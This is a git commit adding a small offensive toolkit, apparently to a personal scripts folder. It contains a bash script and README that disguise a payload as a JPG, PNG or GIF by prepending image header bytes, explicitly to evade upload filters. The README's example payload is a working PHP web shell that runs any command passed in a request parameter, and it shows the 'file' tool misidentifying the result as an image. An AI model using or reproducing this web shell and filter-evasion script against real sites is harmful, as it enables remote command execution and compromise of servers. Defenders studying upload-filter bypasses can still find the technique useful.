Makes a script to disguise a payload as an image

5 years ago · 62e95a50ef
parent baec91da39
commit 62e95a50ef
6 changed files with 106 additions and 0 deletions
--- a/bin/.bin/payload-generation/README.md
+++ b/bin/.bin/payload-generation/README.md
@ -0,0 +1,36 @@
 # Scripts for payload generation
 ## generateImageFromPayload
 This script is designed to disguise a payload as an image. It does this by adding the first 20 bytes of a real image to the beginning of the file and adding a file extension. This will fool most filters that, for example, might only allow images to be uploaded.
 To use it, you will need to have a payload ready to use. It could be anything, here is a simple php script named payload.php
 ```php
 <?php
 if( isset( $_REQUEST['jh'] ) ):
 	system( $_REQUEST['jh'] );
 endif;
 ```
 If I run `generateImageFromPayload payload.php`, the script will create a file called `payload.php.jpg`.
 ```
 .
 ├── payload.php
 └── payload.php.jpg
 ```
 After running `file` on both, you will see that it incorrectly identifies the second as an image.
 ```sh
 file payload.php*
 payload.php:     PHP script, ASCII text
 payload.php.jpg: JPEG image data, JFIF standard 1.01, resolution (DPI), density 300x300, segment length 16
 ```
 The script will, by default, generate a jpg although you can specify png or gif by adding a second argument, e.g.
 ```
 generateImageFromPayload payload.php png
 ```
--- a/bin/.bin/payload-generation/generateImageFromPayload
+++ b/bin/.bin/payload-generation/generateImageFromPayload
@ -0,0 +1,65 @@
 #!/usr/bin/env bash
 # This script takes a payload and disguises it as an image.
 SCRIPTPATH="$( cd "$(dirname "$0")" ; pwd -P )"
 CURRENT=$(pwd)
 PAYLOAD="$1"
 IMAGETYPE="${2:-jpg}"
 # Make sure the image type is lower case
 IMAGETYPE=$(echo "$IMAGETYPE" | tr '[:upper:]' '[:lower:]')
 # This function prints the usage
 function printUsage(){
 	echo "Usage: $(basename "$0") PAYLOAD TYPE"
 	echo ""
 	echo "Disguises a payload as an image"
 	echo ""
 	echo -e "PAYLOAD\t\tThe payload to use, currently only supports a file in CWD (Required)"
 	echo -e "TYPE\t\tThe type of image (jpg, png, gif) (default: jpg)"
 }
 function getPayload(){
 	local payload="$CURRENT/$PAYLOAD"
 	echo "$payload"
 	if [ -f "$payload" ]; then
 		exit 0
 	else
 		# Add stuff here if we want to look in another folder for payloads at some point
 		exit 1
 	fi
 }
 function getTemplate(){
 	local template="$SCRIPTPATH/templates/payload.$IMAGETYPE"
 	echo "$template"
 	if [ -f "$template" ]; then
 		exit 0
 	else
 		exit 1
 	fi
 }
 function getDestination(){
 	echo "$CURRENT/$PAYLOAD.$IMAGETYPE"
 	exit 0
 }
 if template=$(getTemplate); then
 	if payload=$(getPayload); then
 		# Do copy stuff
 		destination=$(getDestination)
 		cp "$template" "$destination"
 		cat "$payload" >> $destination
 	else
 		"No such payload $payload"
 		echo ""
 		printUsage
 	fi
 else
 	echo "No such template $template"
 	echo ""
 	printUsage
 	exit 1
 fi
--- a/bin/.bin/payload-generation/templates/README.md
+++ b/bin/.bin/payload-generation/templates/README.md
@ -0,0 +1,5 @@
 # Image templates
 These images are not real images. They take the first 20 bites of an example image of each type.
 By adding code to these, you will be able to evade many upload filters that only allow images
--- a/bin/.bin/payload-generation/templates/payload.gif
+++ b/bin/.bin/payload-generation/templates/payload.gif
--- a/bin/.bin/payload-generation/templates/payload.jpg
+++ b/bin/.bin/payload-generation/templates/payload.jpg
--- a/bin/.bin/payload-generation/templates/payload.png
+++ b/bin/.bin/payload-generation/templates/payload.png